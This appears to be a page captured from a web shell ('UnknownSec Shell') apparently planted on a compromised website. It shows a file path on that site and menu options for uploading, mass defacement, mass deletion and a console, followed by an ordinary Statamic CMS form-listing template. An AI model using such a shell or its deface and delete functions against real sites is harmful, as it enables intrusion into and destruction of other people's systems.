shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
lolasweb.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
resources
/
views
/
forms
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
index.blade.php
@php use function Statamic\trans as __; @endphp @extends('statamic::layout') @section('title', __('Forms')) @section('content') @unless($forms->isEmpty()) <div class="flex items-center mb-6"> <h1 class="flex-1">{{ __('Forms') }}</h1> @if (Statamic::pro() && $user->can('create', 'Statamic\Contracts\Forms\Form')) <a href="{{ cp_route('forms.create') }}" class="btn-primary">{{ __('Create Form') }}</a> @endif </div> <form-listing :initial-columns="{{ json_encode($initialColumns) }}" action-url="{{ $actionUrl }}" ></form-listing> @else @include('statamic::partials.empty-state', [ 'title' => __('Forms'), 'description' => __('statamic::messages.form_configure_intro'), 'svg' => 'empty/form', 'button_text' => __('Create Form'), 'button_url' => cp_route('forms.create'), 'can' => $user->can('create', 'Statamic\Contracts\Forms\Form') ]) @endunless @include('statamic::partials.docs-callout', [ 'topic' => __('Forms'), 'url' => Statamic::docsUrl('forms') ]) @endsection
© 2026 UnknownSec